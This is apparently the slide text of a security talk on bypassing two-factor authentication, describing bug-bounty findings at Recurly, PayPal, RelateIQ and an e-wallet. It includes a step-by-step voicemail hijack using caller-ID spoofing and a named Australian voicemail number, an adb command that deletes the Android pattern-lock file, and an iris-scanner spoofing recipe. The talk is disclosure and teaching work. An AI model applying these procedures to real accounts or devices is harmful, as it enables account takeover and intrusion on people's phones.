  • 1. ШАХМЕЕР АМИР Shahmeer Amir Обход двухфакторной аутентификации с использованием наиболее простых методов. CEO @ Veiliux Bypassing Multi Factor Authentication
  • 2. WHO AM I? • Penetration Tester and Founder @ Veiliux • Cyber Security researcher • Leisurely Bug Bounty Hunter • M.Sc Security Science • Pursuing Ph.D in Information Security
  • 3. AGENDA • What is 2fa • Conventional 2fa implementations in Web applications • Methods of Bypassing 2fa in Web apps • Methods of bypassing MFA in mobile phones • Foreword about FaceID
  • 4. 2FA, WHAT IS IT? Two factor authentication is a method of utilizing a handheld device as an authenticator for online portals.
  • 5. IS 2FA SECURE? While most organizations consider it a secure means of authenticating their users into their portals, there are methods using which two factor authentication can be bypassed.
  • 6. SEVERAL 2FA IMPLEMENTATIONS SMS 3RD PARTY SOFTWARE
  • 8. TYPES OF 2FA TOKENS There are three different OATH OTP types that are the most widely used: • Event based Tokens • Time-Based Token • Challenge-Based Token
  • 9. An OTP system generates event-based tokens on demand using a combination of a static random key value. EVENT BASED TOKEN
  • 10. An OTP system generates time-based tokens automatically every so often based on a static random key value and a dynamic time value TIME BASED TOKEN
  • 11. An OTP system generates challenge-based tokens on demand using a random challenge key that is provided by the authentication server at each unique user log-in CHALLENGE BASED TOKEN
  • 12. BYPASSING 2FA IN WEB APPS • Bypassing 2fa in Mapbox (Session Management) • Bypassing 2fa in an E-Wallet (Response Manipulation) • Bypassing 2fa in Paypal (Try another way) • Bypassing 2fa in Recurly (Universal Oauth bug) • Bypassing 2fa via exploiting voicemail
  • 13. RECURLY 2FA BYPASS Cause of vulnerability: Automatic login of users after password change
  • 14. User requires a password change User requests a password reset token User changes password via the token Application lets user log automatically after change RECURLY 2FA BYPASS (Cont.d) Process Flow:
  • 15. Attacker has victim’s credentials Attacker logs in and is faced with the a 2fa page Attacker requests password reset token Attacker changes the password and is logged in RECURLY 2FA BYPASS (Cont.d) Abusive Scenario
  • 16. RECURLY 2FA BYPASS (Cont.d)
  • 17. E-WALLET 2FA BYPASS Cause of vulnerability: No Verification of response on client end
  • 18. E-WALLET 2FA BYPASS Complete takeover of an accounts using response manipulation
  • 19. Attacker logs into account Attacker puts incorrect response code Attacker intercepts response with Burp suite Proxy Attacker changes response code and corresponding data to 200 OK E-WALLET 2FA BYPASS Abusive Scenario:
  • 20. • Cause of Vulnerability: Secret question request manipulation PAYPAL 2FA BYPASS
  • 22. Attacker logs into account Attacker selects alternative option to login Attacker enters incorrect answers Attacker intercepts request with Burp Suite Attacker removes “challenge” and “response” fields Attacker is granted access Paypal 2FA BYPASS Abusive Scenario:
  • 23. • Cause of Vulnerability: Oauth manipulation RELATEIQ 2FA BYPASS
  • 25. Attacker compromises user’s facebook account Attacker clicks on “Login via Facebook” Attacker is granted access to the victim’s account RELATEIQ 2FA BYPASS Abusive Scenario:
  • 26. BYPASSING 2FA VIA VOICEMAIL Cause of Vulnerability: Exploiting Voicemail
  • 27. BYPASSING 2FA VIA VOICEMAIL User logs in User requests 2fa code via call User gets a call from someone else at the same time User’s 2fa code is sent to voice mail Process Flow:
  • 28. Attacker logs into the victims account Attacker engages a call with the victims phone number Attacker chooses the 2FA code via Phone Call option As the victim is engaged in the call by the attacker, the 2FA phone calling service will send the 2FA code to the victims voicemail, immediately. Abusive Scenario: BYPASSING 2FA VIA VOICEMAIL
  • 29. EXPLOITING VOICEMAIL Obtain a ANI/Caller ID spoofing service (either via a VoIP provider) or via a dedicated spoofing provider. STEP 1:
  • 30. EXPLOITING VOICEMAIL For all the services in the Australian region input the destination number as: +610411000321. STEP 2:
  • 31. EXPLOITING VOICEMAIL Enter the "Caller ID to Display" as the victim's mobile number. STEP 3:
  • 32. EXPLOITING VOICEMAIL If you're using SpoofCard, a number and access code is displayed. Call this number and input the access code. STEP 4:
  • 33. EXPLOITING VOICEMAIL You will be connected to the victims voicemail service providers endpoint. In this, input the victims mobile number and press #. STEP 5:
  • 34. EXPLANATION FOR USING VM NO. • All reseller's use the exact same main services as Optus does. • Primary number to call for Voicemail is "321" • When spoofing, we need the remote number to call as we are unable to reach "321" • Austrailian cellular providers provide a remote number to call, in case customers are overseas. This number is: +610411000321
  • 35. 2FA BYPASS IN MOBILE PHONES • Bypassing pattern lock via ADB • Bypassing S8 Iris scanner
  • 36. BYPASSING PATTERN LOCK USING ADB This option will work only when you have enabled USB Debugging previously on your device and your PC is allowed to connect via ADB. If you meet such requirements, it is ideal to use this method to unlock Samsung lock screen.
  • 37. How to • Connect your device to the PC using USB cable and open Command prompt in ADB directory. Type the command "adb shell rm /data/system/gesture.key" and then Enter. BYPASSING PATTERN LOCK USING ADB
  • 38. BYPASSING IRIS SCANNER in S8 Take a photo of the person’s eye Lens Specs: 200 mm Distance: 15 mm Print: High Quality Color Copy Use a Wet lens over it and it will be unlocked With a sufficient amount of time and complete access to the phone, you could theoretically unlock any Galaxy S8 with iris scanning enabled.
  • 39. LETS SEE, HOW IT IS DONE?
  • 41. SO, HOW CAN IT BE HACKED? The Secure Enclave Processor The images captured by Face ID are kept in the encrypted memory of Apple’s special coprocessor, which is called Secure Enclave Processor
  • 42. SEP, What is it Security circuit designed to perform secure services for the rest of the SOC SEP has its own set of peripherals accessible by memory-mapped IO Dedicated IO lines Runs its own operating system (SEPOS)
  • 44. The Future of FaceID is based on SEP • SEP(OS) lacks basic exploit Protections E.g. no memory layout randomization • Shared PMGR and PLL are open attack to attacks • Inclusion of the fuse source pin should be re- evaluated • The demotion functionality appears rather dangerous